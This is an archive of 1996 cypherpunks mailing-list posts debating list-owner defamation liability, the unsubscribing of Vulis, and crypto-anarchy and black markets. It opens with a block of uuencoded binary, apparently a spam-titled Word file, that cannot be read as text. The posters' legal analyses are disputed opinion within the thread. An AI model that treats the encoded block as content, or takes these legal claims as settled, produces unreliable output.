M4`!,4%0Q.@!(4%!#3#5-4P!(4"!,87-E<DIE="`U4`!(4"!,87-E<DIE="`U
M4``````````````````````````$`024`$```V<`!@$``0#V!/H"```!``$`
M6`(!``$`6`($````````````````````````````````````````````````
M```````````````````````````````````````&`0```@``````````````
M`0!``$U3541.`TA0($QA<V5R2F5T(#50````````````````````````Y`$`
M```````[`0`````$`&0`"@```$A0($QA<V5R2F5T(#50````````````````
M``````````0!!)0`0``#9P`&`0`!`/8$^@(```$``0!8`@$``0!8`@0`````
M````````````````````````````````````````````````````````````
M``````````````````````8!```"```````````````!`$``35-51$X#2%`@
M3&%S97)*970@-5````````````````````````#D`0```````#L!``````0`
M9``*`````X`!`.X5``#N%0``!P`!``$`[A4```````#.%0``,0`5%I`!``!4
M:6UE<R!.97<@4F]M86X`#!:0`0(`4WEM8F]L``LFD`$``$%R:6%L`"(`!`!Q
M"(@8``#0`@``:`$`````\DL+QO)+"\8``````0``````+`,``!82```#``D`
M```$`(,0)@```````````````P`!`````0`````````D`P````!1````(20D
M)$5!4DX@34].15D@1D%35"!!3D0@3$5'251)34%410````Y*86UE<R!(86UI
M;'1O;@Y*86UE<R!(86UI;'1O;@````````````#_______\/____________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M___________________X?____________P$````"`````P````0````%````
M!@````<````(````"0````H````+````#`````T````.````#P```!`````1
M````$@```/[____]____%P```/[___\?````_O______________________
M___________________^________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M________________________________________________________4@!O
M`&\`=``@`$4`;@!T`'(`>0``````````````````````````````````````
M`````````````````````!8`!0'__________P$`````"0(``````,``````
M``!&````````````````X,&^#8C.NP$6````@`,```````!7`&\`<@!D`$0`
M;P!C`'4`;0!E`&X`=````&U0%'E'`$,Z7$UY($1O8W5M96YT<P``````````
M````````````&@`"`0(````#````_____P``````````````````````````
M```````````````````````````C)0````````$`0P!O`&T`<`!/`&(`:@``
M````````````````````````````````````````````````````````````
M```2``(!________________````````````````````````````````````
M`````````````````&H`````````!0!3`'4`;0!M`&$`<@!Y`$D`;@!F`&\`
M<@!M`&$`=`!I`&\`;@````(````"`````````````````````````"@``@'_
M____!````/____\`````````````````````````````````````````````
M```"````Y`$````````!````_O___P,````$````!0````8````'````"```
M``D```#^____"P````P````-````_O______________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M_________________________________________P$`_O\#"@``_____P`)
M`@``````P````````$88````36EC<F]S;V9T(%=O<F0@1&]C=6UE;G0`"@``
M`$U35V]R9$1O8P`0````5V]R9"Y$;V-U;65N="XV`/0YLG$`````````````
M``#0SQ'@H;$:X0``````````````````_O\```0``@``````````````````
M`````0```."%G_+Y3V@0JY$(`"LGL]DP````M`$``!(````!````F`````(`
M``"@`````P```,P````$````V`````4```#P````!@```/P````'````"`$`
M``@````8`0``"0```#`!```2````/`$```H```!D`0``"P```'`!```,````
M?`$```T```"(`0``#@```)0!```/````G`$``!````"D`0``$P```*P!```"
M````Y`0``!X````B````)"0D14%23B!-3TY%62!&05-4($%.1"!,14=)5$E-
M051%`$``'@````$`````````'@````\```!*86UE<R!(86UI;'1O;@#_'@``
M``$`````````'@````$`````````'@````<```!.;W)M86P``!X````/````
M2F%M97,@2&%M:6QT;VX``!X````"````,0!L=!X````>````36EC<F]S;V9T
M(%=O!0!$`&\`8P!U`&T`90!N`'0`4P!U`&T`;0!A`'(`>0!)`&X`9@!O`'(`
M;0!A`'0`:0!O`&X``````````````#@``@#_______________\`````````
M```````````````````````````````````````*````_```````````````
M````````````````````````````````````````````````````````````
M`````````````````````````/_______________P``````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````________________````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````#_______________\`````````````````````````````````````
M``````````````````````````#^_P``!``"```````````````````````!
M`````M7-U9PN&Q"3EP@`*RSYKC````#,````"`````$```!(````#P```%``
M```$````:`````4```!P````!@```'@````+````@````!````"(````#```
M`)`````"````Y`0``!X````/````1FER<W0@175R;W!E86X```,`````,@``
M`P```"8````#````"0````L`````````"P`````````,$````@```!X````B
M````)"0D14%23B!-3TY%62!&05-4($%.1"!,14=)5$E-051%``,`````````
M``#_________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M_______________________________X?_____________\/____________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M___________________X?_____________\/________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M_______X?_____________\/____________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M_______________________________________________________X?___
M__________\/________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M___________________________________________X?_____________\/
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M_______________________________X?_____________\/____________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M___________________X?_____________\/________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M_______X?_____________\/____________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M_______________________________________________________X?___
M__________\/________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M___________________________________________X?_____________\/
M___________^`/__X'__@?_\'/___________!_\!_________P/__`_____
M_C__________________________________________________________
M____________________________________________________________
M____________________________________________________________
M_______________________________X?_____________\/___________P
M``__AA_^&'_X#`__P`_``/`#^`_P`?@!_P`@!_##_\,/X`0`_!__________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M___________________X?_____________\/___________`?@/_#P_\/#_P
M=`/_X'_X`?P/\`?@`/X#_\#X'^'A_X>'^!\#^`______________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M_______X?_____________\/__________^!_P'^'P?X?!_@^`__\/_X`_P/
MX#/`/'X'_\#X'\/@_P^#^!\#^`__________________________________
M____________________________________________________________
M____________________________________________________________
M_______________________________________________________X?___
M__________\/__________X#_P'^'X?X?A_`_`__^/_X!_P/X'N`?SX'_\#X
M'\/P_P_#^!\#^`______________________________________________
M____________________________________________________________
M____________________________________________________________
M___________________________________________X?_____________\/
M__________X'_P'\'X/P?@_`_`___/_X!_P/X'^`_[X'_\#X'X/P?@_!^!\#
M_!__________________________________________________________
M_____W)D(&9O<B!7:6YD;W=S(#DU````0```````````````0```````````
M````0`````!T=/2'SKL!0`````!T=/2'SKL!`P````,````#````+`,```,`
M```6$@```P````````#0SQ'@H;$:X0`````````````````````^``,`_O\`
M``0``@```````````````````````0````+5S=6<+AL0DY<(`"LL^:XP````
MS`````@````!````2`````\```!0````!````&@````%````<`````8```!X
M````"P```(`````0````B`````P```"0`````@```.0$```>````#P```$9I
M<G-T($5U<F]P96%N```#`````#(```,````F`````P````D````+````````
M``L`````````#!````(````>````(@```"0D)$5!4DX@34].15D@1D%35"!!
M3D0@3$5'251)34%410`#````````````T,\1X/______________________
M____________________________________________________________
M____________________________________________________________
5____________________________
`
end




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 9 Nov 1996 18:59:17 -0800 (PST)
To: ravage@einstein.ssz.com>
Subject: Re: Mailing list liability
In-Reply-To: <199611092351.RAA01501@einstein>
Message-ID: <Pine.LNX.3.95.961109214609.1822A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Note that none of these say anything about any commercial service being held
liable for defamatory statements because the service cancelled a user's
account or prevented a user from posting in certain areas.  I really don't
see why you consider unsubscribing someone from a mailing list the equivalent
of monitoring posts and exercising editorial control.  Dr. Vulis can still
post to cypherpunks and can still read the list -- just not receive traffic
from toad.com.  Compuserve probably cancels accounts of people who violate the
service agreement.  Of course, you will just argue that there is some sort of
implied contract wrt cypherpunks.  This is ridiculous.  All the complex
aspects of implied contracts would require someone wanting to start a free
mailing list get a lawyer to make sure that anything contrary to an implied
contract is stated in the "welcome message."

As for cypherpunks being advertised as an open mailing list, John Gilmore is
not responsible for these "advertisements" and has never stated that he would
not unsubscribe anyone for any reason.  Nothing about everyone having some
inherent "right" to be subscribed has ever been stated by the list owner.

On Sat, 9 Nov 1996, Jim Choate wrote:

> Cubby v Compuserve (1991)
> 
> The court reasoned,
> 
> "in essence an electronic, for profit library that carried a vast number of
> publications and collected usage and membership fees from its subscribers in
> return for access to the publications."
> 
> The court further ruled that Compuserve had no more editorial control over
> Rumorville than "does a public library, book store, or newsstand, and it
> would be no more feasible for Compuserve to examine every publication it
> carries for potentialy defamatory statements than it would be for any other
> distributor to do so."
> 
> The court also found, "A computerized database is the functional equivalent
> of a more traditional news vendor, and the inconsistent application of a
> lower standard of liability to an electronic news distributor such as
> Compuserve than  that which is applied to a public library, a book store, or
> a newsstand would impose an undue burden on the free flow of information.
> Given the relevant First Amendment  considerations, the appropriate standard
> of liability is whether it knew or had reason to know of the allegedly
> defamatory Rumorville statements."
> 
> The court held that Compuserve was not liable because Compuserve was a
> "distributor" and not a "publisher." The court concluded that because
> Compuserve did not actively monitor the postings of the forum, it was a
> distributor.
> 
> In summary, the court compared Compuserve to a bookstore selling the book
> rather than the publisher of the book.
> 
> 
> 
> Cianci v New Times Publishing Co. (1980)
> 
> "one who repeats or othewise republishes defamatory matter is subject to the
> liability as if he had originaly published it."
> 
> 
> 
> Lerman v Chuckleberry Publishing, Inc. (1981)
> 
> The court held that with respect to news vendors, book stores, and libraries
> are not liable if "vendors and distributors of defamatory publications are
> not liable if they neither know nor have reason to know of the defamation."
> 
> 
> 
> Stratton Oakmont v Prodigy (1995)
> 
> The critical issue in Prodigy was whether Prodigy exercised sufficient
> editorial control over its computer bulletin boards to render it a publisher
> with the same responsibilities as a newspaper or magazine.
> 
> The court reasoned that there were two distinctions in this case sufficient
> to qualify Prodigy as a publisher. First, it held itself out to the public
> and its members as controlling the content of its computer bulletin boards.
> Second, Prodigy implimented this control through its automated software and
> established guidelines  that board leaders were required to enforce. Prodigy
> was clearly making decisions as to content. Such decisions constitute
> editorial control.
> 
> 
> (1)  ;login:, Oct. 1996, V21N5 pp27.
> 
> 
> 

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMoVFQyzIPc7jvyFpAQFLIwgAiLVzGBZzBZdtIf2nMmoeFCU2c+8eVWnT
fjXdh+6ZtA578inVv1YuOnbGFFoAbfS4DLHyPsdtbdREbJydZt+sourjxTMCxLAX
kYvFNoDxyweVvoE+c8R0Hez+qwNrQ3O9SFJWK1DBAuwU7+UTdbxc+81DKAR3mVlv
cdDwjVijEAJUsGFzhjs7udrEAbTJ4RRoN5y/hC68tr27SzBKS5D5W7KACzuJgcx1
Qv2NIZgz9epYngz9/SLafBFBsbePJkWBuBHwtaPManN7blUnzkRWZ62X9y2EnSZb
CTL8swajmrhtmKfBNX7NvH66ETle/g8D8zUuyjb+xYW0uBzIq9OXeQ==
=2jGC
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 9 Nov 1996 22:08:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Apartment complex burnt down...
In-Reply-To: <199611100453.UAA21059@abraham.cs.berkeley.edu>
Message-ID: <v03007802aeab21dc6f2b@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:53 PM -0800 11/9/96, John Anonymous MacDonald wrote:
>Suppose Bob lives in an apartment complex. By accident the whole building
>burns down.
>
>Bob manages to escape, but all his papers, including passport, IDs,
>credit cards, acount numbers, etc etc gets destroyed.
>
>What can Bob do? Would the government help him?
>
>It seems like he'd be in a really unfavorable position...

Is this a troll?

People lose important papers all the time, such as by losing their wallets
or having their purses stolen, their homes burglarized, etc.

States will issue replacement driver's licenses easily. (Before Mr.
Anonymous asks, "But how will they know you are you?," remember that they
have one's photo, one's signature, and (increasingly) a fingerprint.

Ditto for passports, which are also routinely replaced.

And does the phrase "Call this number if your card is lost or stolen"
suggest something about replacement of credit cards?

I guess this was just a troll, or the post of a high school student
answering his Internet homework question.

--Tim May



"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 9 Nov 1996 22:29:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Legal Saber Rattling and Huffing and Puffing about Lawsuits
In-Reply-To: <199611092250.PAA23102@teal.csn.net>
Message-ID: <v03007803aeab2317b940@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:36 PM -0500 11/9/96, Black Unicorn wrote:
>On Sat, 9 Nov 1996, L.Detweiler wrote:
>
>> just heard an interesting rumor that Timmy has been blacklisted
>> from working anywhere here in Colorado as a dangerous anarchist
>> and/or lunatic revolutionary.
>
>Uh, you're walking the line again here Mr. Detweiler.  I hope this is
>based in fact.

As I would under almost no circumstances sue for such typical
net.defamations, how is Detweiler walking the line? Black Unicorn would
have a very hard time suing on my behalf when I had no interest in suing.

(I may be wrong, but I don't think even with our currently warped judicial
system can Black Unicorn file charges/bring suit against Detweiler for
alleged defamations of Tim May.)

If you mean that Detweiler is violating his "consent agreement," alluded to
over the past couple of years, the one that caused him to simply switch to
the nom de net of "V.Z. Nuri" (the visionary, I presume), I rather doubt
even this is so. Unless your consent agreement had it that Detweiler would
never post again under his own name....in any case, not my concern.

Again, I think this huffing and puffing about planned lawsuits, about "I
have friends in the Office of Legitimate Speech and I'm quite sure they'll
be happy to see your illegal speech here," etc., is inconsistent with goals
I think many of us hold in high regard.

If someone wants to sue, then go ahead. But the huffing and puffing is
getting tiresome. Let's see some real action. In cruder terms, put up or
shut up.

No offense meant to Black Unicorn...it's just that he has on multiple
occasions talked about lawsuits, about friends of his or classmates of his
who are in various governmental roles, and about how interested they might
be blah blah blah. I don't like this kind of bluster. For example, take the
recent example of  using the "Get back on your medications" quip. Black
Unicorn has said in recent days that such a quip might be actionable (I
think this was directed at Vulis, but I could be misremembering things). I
strongly doubt such a common net.quip is actionable in any way. But, in any
case, what about all the quips that Detweiler was off his lithium, off his
thorazine, off his meds? Neither Black Unicorn nor his nominal allies were
raising this point back then. Let's see some consistency. And let's reduce
the amount of "legal saber rattling." OK?

(Yes, I read Black Unicorn's piece here about why he tends to think in
terms of using the American legal system the way he does. I think most
libertarian-minded folks accept the maxim that "sticks and stones may break
my bones, but names will never hurt me"...it sounds like something one
would hear in pre-school, but it remains as true today as back then. More
people ought to remember it. And Black Unicorn's invocation of "false
advertising" in connection with the rants of various snake oilers is
equally misplaced. There will be snake oil, just as there is bad speech. If
Black Unicorn threatens to sic the FTC on Snaketronics...not a good way to
debunk crummy products. The proper remedy for bad speech is more speech.
And, as I noted, part of my ire is not the use of the  legal system, but
the huffing and puffing and idle threats to do so.)

Sorry if the tone sounds angry. I am not angry, just in "forceful
disagreement."

--Tim May


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 9 Nov 1996 22:34:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
In-Reply-To: <199611092020.VAA01385@basement.replay.com>
Message-ID: <v03007804aeab2803e12e@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:20 PM +0100 11/9/96, Anonymous wrote:
>Peter Hendrickson <ph@netcom.com> wrote:
>
>> What are the benefits of being a cryptoanarchist?  Maybe you get
>> to double your income.  Most people won't see this as worth the
>> trouble.
>
>If you don't have enough to eat, doubling your income is worth the
>trouble.
>
>Crypto-anarchy benefits the poor more than the rich.  The underlings
>of society are going to love it.

In fact, they basically already practice it. Not with computers, of course,
but in terms of not reporting cash income, not reporting tips, engaging in
barter work with others, and gambling in various non-sanctioned markets.

(Numbers games and sports betting are huge markets. Interestingly, such
markets also validate much of what we say about "reputations." After all,
when was the last time you heard about a bookie being sued in court for not
paying up? And private justice is administered, as welshers are disposed of
directly, without a  long, expensive trial. Nearly everything in "crypto
anarchy" has direct parallels in "underworld and black markets." Some say
they are really the same thing. Perhaps.)

--Tim May



"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com
Date: Sat, 9 Nov 1996 21:57:09 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: His and Her Anarchies
Message-ID: <199611100556.WAA16087@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn <dthorn@gte.net> wrote:

[...]

>While many, many
>women have harrassed me on the road for my driving, they (unlike men, w/o
exception)
>have *never* tried to threaten me directly, as have hundreds of men.

Might all these hundreds of threatening men and many, many harassing women
be trying to tell you something?

[...]

>I would suggest to any man that if he lived
>in a society where a whole class of humans (i.e., female) were more
aggressive and
>confrontational, more domineering, etc. than he and nearly every other man
he knew,
>he would probably learn how best to get along with that other class of
persons without
>constantly butting heads with them.

Dale Thorn, meet Oprah, RuPaul, Hillary Rotten, Roseanne, Andrea Dworkin,
Winnie Mandella, etc.

Now back to S. Logan, Vulis, AP, whatever.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 9 Nov 1996 21:09:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Mailing list liability (fwd)
Message-ID: <199611100513.XAA01797@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From markm@gak Sat Nov  9 21:03:24 1996
> 
> Note that none of these say anything about any commercial service being held
> liable for defamatory statements because the service cancelled a user's
> account or prevented a user from posting in certain areas.  I really don't
> see why you consider unsubscribing someone from a mailing list the equivalent
> of monitoring posts and exercising editorial control.

It is exactly editorial control because it prevents, a priori, submissions by
Vulis under that account. He is FORCED to resort to other means. That is
what the courts will see, it is what the jury will see, and it is what will
eventualy sink the list, and place its operator under financial burden for
years.

I joined this list under my own volition, I agreed to no review by the list
operator at any time. I did not agree to not hurt his feelings with my
comments or views. I did not agree to agree with the operator of the list.
I did not agree to make him feel warm and fuzzy inside. I agreed to NOTHING
other than my permission for him to put your submissions in my email box. The
only way I can be removed from this list and not open the operator up to
legal consequences is by my own volition or the total cessation of this list.
This applies to every member subscribed so long as their is no proviso posted
at subscription time.

They were held liable for the comments of their users BECAUSE they
demonstrated editorial control. In removing Vulis from the list he has
demonstrated editorial control. Prior to this act he was immune from
rantings and ravings of the various idiots on this list. Now he is not.
The fact that it was a commercial service was irrelevant and not an issue in
the court cases. What was involved was the responsibility of the service
operators, the agreement between service and users, and who had editorial
control (users v service). And finaly, if your contention is that if you set
up a press and start cranking out flyers (digital or otherwise), which defame
or otherwise liable, you are immune from prosecution unless you are a
business then you are in for a very rude surprise.

Sooner or later somebody is going to submit a posting which will go through.
That posting will be pointed at a particular personality. That personality
will take exception and sue the list operator, and because of this action
will have a very high chance of winning. Not only does the list operator
loose but we all loose because it is going to set a precedence that will
take many years more to recover from.

I seldom get personal but there are a few of you folks that have your heads up
your collective crypto-anarchy asses. Here is a simple process whereby you
can protect yourself from legal reprisals and you don't take it. God help
you because the courts shure as hell won't.

In case you people don't get it, the whole point is to REDUCE the influence
and control of the government (local, state, and federal). NOT to give even
more fodder to shoot. For a list operator a primary if not the primary
goal is to avoid any legal involvement at all costs. Throwing people off
lists with no subscription limitations is not the way to do that. To be a
succesful list operator your scruples and the way you treat your subscribers
MUST be beyond any reproach. The bottem line is that the act was not
professional and impacts the image of mailing lists, Cypherpunks, its operator,
and its members in a negative light. I have operated BBS'es and mailing
lists since '76 and find such actions on the part of a fellow service
operator to be insulting to the profession that I have enjoyed for 20 years.

Those of you who contend that because there is no explicit contract between
operator and subscriber this is sufficient to allow the operator to enact
any policies they wish with no warning or other consideration are in for a
nasty surprise. You will find that this will in fact prevent a list operator
from doing anything other than upgrading software, buying more disk space, and
paying the bills because that is the ONLY way they will be able to retain
commen carrier style protections. Without that protection a list operator is
faced with reviewing every submission to a list prior to redistribution or
face the legal and financial consequences. I do not wish to see the Cypherpunks
mailing list to become that litmus test.

Consider this, the Cypherpunks mailing list is a very public list in many
ways it is the vanguard of what tomorrows net will be like. Is this the sort
of environment that can survive? With this as the current list policy I
think we are all taking part in a dinosaur.

                                                    Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com
Date: Sat, 9 Nov 1996 22:35:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Apartment complex burnt down...
Message-ID: <199611100635.XAA29357@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 9 Nov 1996, John Anonymous MacDonald wrote:

>Suppose Bob lives in an apartment complex. By accident the whole building
>burns down. 
>
>Bob manages to escape, but all his papers, including passport, IDs,
>credit cards, acount numbers, etc etc gets destroyed.
>
>What can Bob do? Would the government help him?

Why?

>It seems like he'd be in a really unfavorable position...

Umm-hmmm.

Calling Sunkyong Moon-Yip (sp?):  List please off him getts.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 9 Nov 1996 20:38:06 -0800 (PST)
To: "L.Detweiler" <ldetweil@csn.net>
Subject: Re: Timmy
In-Reply-To: <199611092250.PAA23102@teal.csn.net>
Message-ID: <Pine.SUN.3.94.961109233519.9873R-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 9 Nov 1996, L.Detweiler wrote:

> just heard an interesting rumor that Timmy has been blacklisted
> from working anywhere here in Colorado as a dangerous anarchist
> and/or lunatic revolutionary.

Uh, you're walking the line again here Mr. Detweiler.  I hope this is
based in fact.

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 9 Nov 1996 21:36:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: Apartment complex burnt down... (fwd)
Message-ID: <199611100540.XAA01829@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 9 Nov 1996 20:53:02 -0800
> From: nobody@cypherpunks.ca (John Anonymous MacDonald)
> 
> Suppose Bob lives in an apartment complex. By accident the whole building
> burns down. 
> 
> Bob manages to escape, but all his papers, including passport, IDs,
> credit cards, acount numbers, etc etc gets destroyed.
> 
> What can Bob do? Would the government help him?
> 
> It seems like he'd be in a really unfavorable position...

I was there 2 years ago. The Red Cross is about the only group you can count
on other than family, friends and a church (if you happen to belong to one).

Getting another drivers license was a easy operation. Head down to the local
DPS office and request a replacement card for a lost license. The titles and
such for property and auto were tedious but not impossible. I didn't need to
show anything other than my drivers license and pay the requisite fees to
obtain new copies of the deeds. In general the governmental types of
documents and such were easy to replace. I personaly had all the necessary
copies of the documents I needed within a month or so. The personal items
were impossible to replace and caused the most emotional turmoil.

In many parts of the country the Red Cross is delepeted both in operating
funds and volunteers. If you can, please consider giving them your support.
I personaly didn't use them but both my roomies did.


                                                     Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Ingle <inglem@adnetsol.com>
Date: Sat, 9 Nov 1996 23:47:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: Black markets vs. cryptoanarchy
Message-ID: <199611100747.XAA00328@cryptical.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


Cryptoanarchy will have arrived when you can openly _advertise_ these
services and still stay in business indefinitely. Most of the things we
talk about - even Jim Bell's assassination market - already exist, but
they cannot be advertised. You have to go looking for them, at some
risk to both buyer and seller. If the seller is visible enough for you
to find him, he is visible enough to get caught.

For example, there is plenty of 'pirate' material on the net, but it
tends to go away as soon as the addresses become well-known.
Cryptoanarchy will be here when you can advertise yourself as a
distributor of pirate software (or anything else you want to sell), do
business with a publicly known contact address, and still not get
caught. 'Black markets' exist due to the inability to do this.

Currently the techniques of anonymity are limited to two: indirection
for source anonymity and broadcast for recipient anonymity. We are more
or less where crypto was before the invention of public key. You can
gain security by spreading risk among multiple parties (key
distributors for crypto, or remailers for anonymity) but you can't 
'make your own anonymity' like you can make your own security with 
public key crypto.

A theoretical discovery is needed particularly in the area of recipient
anonymity. Good sender anonymity and weak recipient anonymity leads to
'hit and run' behavior such as spamming email and newsgroups, but not
to anonymous markets.

						Mike

> >Crypto-anarchy benefits the poor more than the rich.  The underlings
> >of society are going to love it.
> 
> In fact, they basically already practice it. Not with computers, of course,
> but in terms of not reporting cash income, not reporting tips, engaging in
> barter work with others, and gambling in various non-sanctioned markets.
> 
> (Numbers games and sports betting are huge markets. Interestingly, such
> markets also validate much of what we say about "reputations." After all,
> when was the last time you heard about a bookie being sued in court for not
> paying up? And private justice is administered, as welshers are disposed of
> directly, without a  long, expensive trial. Nearly everything in "crypto
> anarchy" has direct parallels in "underworld and black markets." Some say
> they are really the same thing. Perhaps.)
> 
> --Tim May




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Sat, 16 Nov 1996 14:51:03 -0800 (PST)
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: Mailing list liability (fwd)
Message-ID: <3.0b28.32.19961110014235.0071328c@mail.io.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:13 PM 11/9/96 -0600, Jim Choate wrote:
>> From markm@gak Sat Nov  9 21:03:24 1996
>> Note that none of these say anything about any commercial service being
held
>> liable for defamatory statements because the service cancelled a user's
>> account or prevented a user from posting in certain areas.  I really don't
>> see why you consider unsubscribing someone from a mailing list the
equivalent
>> of monitoring posts and exercising editorial control.
>
>It is exactly editorial control because it prevents, a priori, submissions by
>Vulis under that account. He is FORCED to resort to other means. That is
>what the courts will see, it is what the jury will see, and it is what will
>eventualy sink the list, and place its operator under financial burden for
>years.

This is inaccurate. Vulis is still sending posts to the list and they are
distributed to subscribers. You seem to have assumed that submissions are
only accepted from subscribers. This assumption is wrong.

>I joined this list under my own volition, I agreed to no review by the list
>operator at any time. I did not agree to not hurt his feelings with my
>comments or views. I did not agree to agree with the operator of the list.
>I did not agree to make him feel warm and fuzzy inside. I agreed to NOTHING
>other than my permission for him to put your submissions in my email box.

I have a very hard time seeing a contract here - I don't think there was
anything close to a "meeting of the minds" to the terms you seem to
imagine, nor do I see any consideration. As you've indicated above, you
took on no obligations - which suggests that your relationship to the list
owner is not that of a party to a contract, but as a recipient of a gift.
The donor of a gift (or series of gifts) is free to stop giving at their
whim. 

> The
>only way I can be removed from this list and not open the operator up to
>legal consequences is by my own volition or the total cessation of this list.
>This applies to every member subscribed so long as their is no proviso posted
>at subscription time.

I disagree strongly. I also strongly disagree that there was/is any
contract between Gilmore and list subscribers or authors. And I strongly
disagree with your ideas about posting notices and the "default" situation
where notices aren't posted. I think that you're mixing up your analyses re
defamation and contract (they are **not** the same thing). I also think
you're using contract-style language to describe obligations apparently
imposed by law, which is misleading. Further, I'm not aware of any law
which would impose the obligations you imagine. If you've got better
information, perhaps you'd be kind enough to post a citation so the rest of
us can catch up with you.

The case summaries you posted don't support your conclusion. The only one
that's even in the neighborhood is Stratton-Oakmont; which, as I pointed
out before, is appreciably different factually (the degree of control was
much greater, the forum was advertised as a controlled one, and the
defendant inspected the message before it was made public), did not receive
further scrutiny at an appellate level, and has been criticized by
commentators and scholars as being poorly reasoned. Stratton-Oakmont is a
poor case to rely upon. As far as I can tell, you're basing your legal
conclusion on the depth and quality of your feelings about this issue,
which is always a mistake.

Finally (and dispositively), the entire field of liability for "publishers"
of online information was changed by the Communications Decency Act. See
<http://www.gdf.com/lb4-1.htm#N3> for more.

But this discussion reminds me of the unproductive discussions that various
legal-minded folks (myself included) have had with Jim Bell from time to
